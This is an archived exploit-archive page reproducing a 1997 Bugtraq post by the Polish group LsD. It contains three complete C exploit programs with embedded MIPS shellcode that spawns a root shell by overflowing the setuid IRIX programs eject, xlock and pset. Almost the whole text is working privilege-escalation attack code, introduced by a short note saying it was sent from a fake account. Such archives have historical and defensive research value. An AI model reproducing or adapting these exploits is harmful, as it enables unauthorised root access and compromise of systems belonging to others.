3 More IRIX buffer overflows, courtesy of LsD

Summary
Description:Apparently, the "anonymous friend" who sent exploit code to Yuri may have swiped it from the polish group LsD. Anyway, they sent in 3 more exploits which are very similar (actually almost exactly the same) as those Yuri's polish friend sent.
Author:Sent from a hacked account by LsD, Last Stage of Delirium
Compromise: root (local)
Vulnerable Systems:IRIX, presumably up to 6.3
Date:25 May 1997
Details


Date: Mon, 26 May 1997 00:30:53 -0700
From: Mats Andersson <matsa@WWW.TRYCKINDUSTRI.SE>
To: BUGTRAQ@NETSPACE.ORG

                                           Sun 25 May 1997, somewhere in Poland.

Hi everyone!

We're sending you a sample of the codes that were originally written
by the polish group LsD.
In general we are not eager to release our codes but after Yuri's letter
we felt that something was left unmentioned.
We would like to indicate that these pieces of code were written about
half a year ago, just after the release of the Aleph1's article
in Phrack "Smashing the stack for fun and profit".

The exploits were written just for our purposes so they are not as perfectly
written as they should be. But in our opinion this is not what is all about
in this kind of programs.
We are not posting df and ordist exploit sources because they are
"amazingly" similar to the sources sent to Yuri.

This is just a sample. We assure you that there are more buffer overflow
exploitable programs on irix.

Credits go to :
 - Aleph1 for his infamous article about buffer overflow technic,
 - David Hedley for being the first person publicly revealing the irix bo secret,
 - "anonymous friend" for his "cooperation", just dont know what to say you

Greetings go to:
 - our friends from the swedish PTR group,
 - all polish hackers


P.S. This letter was sent from the fake account.....please dont use it.

---------------------------------------------------------------------------------
/* copyright by */
/* Last Stage of Delirium, Dec 1996, Poland*/

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

#define BUFSIZE 2068
#define OFFS 800
#define ADDRS 3
#define ALIGN 0
#define ALIGN2 4

char asmcode[]="\x3c\x18\x2f\x62\x37\x18\x69\x6e\x3c\x19\x2f\x73\x37\x39\x68\x2e\xaf\xb8\xff\xf8\xaf\xb9\xff\xfc\xa3\xa0\xff\xff\x27\xa4\xff\xf8\x27\xa5\xff\xf0\x01\x60\x30\x24\xaf\xa4\xff\xf0\xaf\xa0\xff\xf4\x24\x02\x04\x23\x02\x04\x8d\x0c";
char nop[]="\x24\x0f\x12\x34";

void run(unsigned char *buf) {
  execl("/usr/sbin/eject","lsd",buf,NULL);
  printf("execl failed\n");
}

char jump[]="\x03\xa0\x10\x25\x03\xe0\x00\x08\x24\x0f\x12\x34\x24\x0f\x12\x34";

main(int argc, char *argv[]) {
  char *buf, *ptr, addr[8];
  int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS, align=ALIGN;
  int i, noplen=strlen(nop);

  if (argc >1) bufsize=atoi(argv[1]);
  if (argc >2) offs=atoi(argv[2]);
  if (argc >3) addrs=atoi(argv[3]);
  if (argc >4) align=atoi(argv[4]);

  if (bufsize<strlen(asmcode)) {
    printf("bufsize too small, code is %d bytes long\n", strlen(asmcode));
    exit(1);
  }
  if ((buf=malloc(bufsize+(ADDRS<<2)+noplen+1))==NULL) {
    printf("Can't malloc\n");
    exit(1);
  }

  *(int *)addr=(*(unsigned long(*)())jump)()+offs;
  printf("address=%p\n",*(int *)addr);

  strcpy(buf,nop);
  ptr=buf+noplen;
  buf+=4-align;
  for(i=0;i<bufsize;i++)
   *ptr++=nop[i%noplen];
  memcpy(ptr-strlen(asmcode),asmcode,strlen(asmcode));
  for(i=0;i<(addrs<<2);i++)
   *ptr++=addr[i%sizeof(int)];
  *ptr=0;

  printf("buflen=%d\n", strlen(buf));
  fflush(stdout);

  ptr-=addrs<<2;
  *(int *)addr+=(0x7fff350c-0x7fff31e8)+(4*100)+ALIGN2;
  for(i=0;i<64;i++)
   *ptr++=addr[i&3];


/* gp value is set here */
  ptr=buf+ALIGN+(0x7fff2f00-0x7fff2ce8)-24;
  *(int *)addr=(*(unsigned long(*)())jump)()+OFFS+(0x7fff350c-0x7fff31e8-4)+ALIGN2+32+32412;

  for(i=0;i<64;i++)
   *ptr++=addr[i&3];

  run(buf);
}

------------------------------------------------------------------------------------
/* copyright by */
/* Last Stage of Delirium, Dec 1996, Poland*/

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

#define BUFSIZE 2072
#define OFFS (800+512+128)
#define ADDRS 0x100
#define ALIGN 2

char asmcode[]="\x3c\x18\x2f\x62\x37\x18\x69\x6e\x3c\x19\x2f\x73\x37\x39\x68\x2e\xaf\xb8\xff\xf8\xaf\xb9\xff\xfc\xa3\xa0\xff\xff\x27\xa4\xff\xf8\x27\xa5\xff\xf0\x01\x60\x30\x24\xaf\xa4\xff\xf0\xaf\xa0\xff\xf4\x24\x02\x04\x23\x02\x04\x8d\x0c";
char nop[]="\x24\x0f\x12\x34";

void run(unsigned char *buf) {
  execl("/usr/bin/X11/xlock","lsd","-name",buf,NULL);
  printf("execl failed\n");
}

char jump[]="\x03\xa0\x10\x25\x03\xe0\x00\x08\x24\x0f\x12\x34\x24\x0f\x12\x34";

main(int argc, char *argv[]) {
  char *buf, *ptr, addr[8];
  int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS, align=ALIGN;
  int i, noplen=strlen(nop);

  if (argc >1) bufsize=atoi(argv[1]);
  if (argc >2) offs=atoi(argv[2]);
  if (argc >3) addrs=atoi(argv[3]);
  if (argc >4) align=atoi(argv[4]);

  if (bufsize<strlen(asmcode)) {
    printf("bufsize too small, code is %d bytes long\n", strlen(asmcode));
    exit(1);
  }
  if ((buf=malloc(bufsize+(ADDRS<<2)+noplen+1))==NULL) {
    printf("Can't malloc\n");
    exit(1);
  }

  *(int *)addr=(*(unsigned long(*)())jump)()+offs;
  printf("address=%p\n",*(int *)addr);

  strcpy(buf,nop);
  ptr=buf+noplen;
  buf+=4-align;
  for(i=0;i<bufsize;i++)
   *ptr++=nop[i%noplen];
  memcpy(ptr-strlen(asmcode),asmcode,strlen(asmcode));
  for(i=0;i<(addrs<<2);i++)
   *ptr++=addr[i%sizeof(int)];
  *ptr=0;

  printf("buflen=%d\n",strlen(buf));
  fflush(stdout);

/* gp value is set here */
  ptr=buf+ALIGN+(0x7fff22c0-0x7fff1ea0);
  *(int *)addr=(*(unsigned long(*)())jump)()+OFFS+(0x7fff3828-0x7fff3468)+32476;
  for(i=0;i<4;i++)
   *ptr++=addr[i&3];

  run(buf);
}

------------------------------------------------------------------------------------
/* copyright by */
/* Last Stage of Delirium, Dec 1996, Poland*/

/* This one gives you egid=0(sys) */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

#define BUFSIZE 4172
#define OFFS 816
#define ADDRS 8
#define ALIGN 3
#define ALIGN2 1

char asmcode[]="\x3c\x18\x2f\x62\x37\x18\x69\x6e\x3c\x19\x2f\x73\x37\x39\x68\x2e\xaf\xb8\xff\xf8\xaf\xb9\xff\xfc\xa3\xa0\xff\xff\x27\xa4\xff\xf8\x27\xa5\xff\xf0\x01\x60\x30\x24\xaf\xa4\xff\xf0\xaf\xa0\xff\xf4\x24\x02\x04\x23\x02\x04\x8d\x0c";
/*
char nop[]="\x24\x0f\x12\x34";
*/
char nop[]="\x01\x20\x48\x25";

void run(unsigned char *buf) {
  execl("/sbin/pset","lsd","-s","666",buf,NULL);
  printf("execl failed\n");
}

char jump[]="\x03\xa0\x10\x25\x03\xe0\x00\x08\x24\x0f\x12\x34\x24\x0f\x12\x34";

/*
unsigned long get_sp(void) {
__asm__("or     $2,$sp,$0");
}
*/
main(int argc, char *argv[]) {
  char *buf, *ptr, addr[8];
  int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS, align=ALIGN;
  int i, noplen=strlen(nop);

  if (argc >1) bufsize=atoi(argv[1]);
  if (argc >2) offs=atoi(argv[2]);
  if (argc >3) addrs=atoi(argv[3]);
  if (argc >4) align=atoi(argv[4]);

  if (bufsize<strlen(asmcode)) {
    printf("bufsize too small, code is %d bytes long\n", strlen(asmcode));
    exit(1);
  }
  if ((buf=malloc(bufsize+(ADDRS<<2)+noplen+1))==NULL) {
    printf("Can't malloc\n");
    exit(1);
  }

  *(int *)addr=(*(unsigned long(*)())jump)()+offs;
  printf("address=%p\n", *(int *)addr);

  strcpy(buf,nop);
  ptr=buf+noplen;
  buf+=align;
  for(i=0;i<bufsize;i++)
   *ptr++=nop[i%noplen];
  memcpy(ptr-strlen(asmcode),asmcode,strlen(asmcode));
  for(i=0;i<ALIGN2;i++)
   *ptr++=nop[i%noplen];
  for(i=0;i<(addrs<<2);i++)
   *ptr++=addr[i%sizeof(int)];
  *ptr=0;
  printf("buflen=%d\n", strlen(buf));
  fflush(stdout);

  run(buf);
}

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]